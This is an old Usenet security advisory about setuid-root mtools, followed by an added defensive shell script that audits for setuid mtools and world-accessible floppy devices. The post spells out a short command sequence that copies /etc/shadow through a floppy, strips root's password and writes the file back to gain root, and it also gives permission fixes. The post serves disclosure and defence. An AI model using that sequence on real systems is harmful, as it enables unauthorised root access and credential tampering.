Path: ecs.ox.ac.uk!m91dps
Newsgroups: comp.os.linux.admin
Subject: Possible security hole (software version/setup dependant)
Expires:
References:
Sender:
Followup-To:
Distribution: world
Organization: Oxford University Undergraduate Engineering & Comp Sci Lab, UK
Keywords:

The following security hole may or may not be present on your system.
If you have your mtools setuid root, the following could well be possible
if you have a mess-dos disc in the floppy drive...

    cracker% mwrite /etc/shadow A:
    cracker% mread A:shadow hehe
    cracker% <upload and edit hehe so root has no password>
    cracker% <upload diddled /etc/shadow>
    cracker% mwrite diddled A:
    cracker% mread diddled /etc/shadow
    cracker% su root

If this security hole is present on your system, try:

    chgrp fdisc /dev/fd*
    chmod 660 /dev/fd*
    chgrp fdisc /usr/bin/<mtools>
    chmod a-s,g+s /usr/bin/<mtools>

(The presence or absence of this hole is obviously dependant on what version
of the mtools you use and how it is set up).
Duncan (-:
"I'll try it on my system sometime soon... it was just a cute idea I had"
P.S. if you have / as a dos disc and the emulator setuid root make sure that
crackers can't use the dos emulator to give you an alternative version
of things you don't want them to (e.g. /etc/shadow).
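
A check for the condition described in the post above, as an added example that is not part of the original message: it reports mtools commands that still carry the setuid bit and floppy device nodes that are world readable or writable. The command list, the function names and the MTOOLS_DIR and FLOPPY_PREFIX variables are assumptions made for this sketch.

```shell
#!/bin/sh
# Added example, not from the original post.
# Assumed list of mtools command names; adjust to what your package installs.
MTOOLS_CMDS="mtools mattrib mcd mcopy mdel mdir mformat mlabel mmd mrd mread mren mtype mwrite"

# Print each mtools command in directory $1 that has the set-user-ID bit.
# Any setuid owner is reported; the post's concern is setuid root.
setuid_mtools() {
    dir=$1
    for cmd in $MTOOLS_CMDS; do
        f="$dir/$cmd"
        # -u is true when the file exists and its set-user-ID bit is set
        if [ -f "$f" ] && [ -u "$f" ]; then
            echo "$cmd"
        fi
    done
}

# Print every node matching prefix $1 that "other" can read or write,
# i.e. nodes that do not yet have the 660 mode suggested in the post.
world_accessible_nodes() {
    for node in "$1"*; do
        [ -e "$node" ] || continue
        # Skip symlinks and directories such as /dev/fd on newer systems
        if [ -L "$node" ] || [ -d "$node" ]; then
            continue
        fi
        find "$node" -prune \( -perm -004 -o -perm -002 \) -print
    done
}

# Run both checks; returns non-zero when anything was reported.
audit() {
    bad=$(setuid_mtools "${MTOOLS_DIR:-/usr/bin}")
    open=$(world_accessible_nodes "${FLOPPY_PREFIX:-/dev/fd}")
    [ -z "$bad" ] || echo "setuid mtools commands:" $bad
    [ -z "$open" ] || echo "world-accessible floppy nodes:" $open
    [ -z "$bad$open" ]
}

# Only audit the live system when asked to: sh thisfile --audit
if [ "${1:-}" = "--audit" ]; then
    audit
fi
```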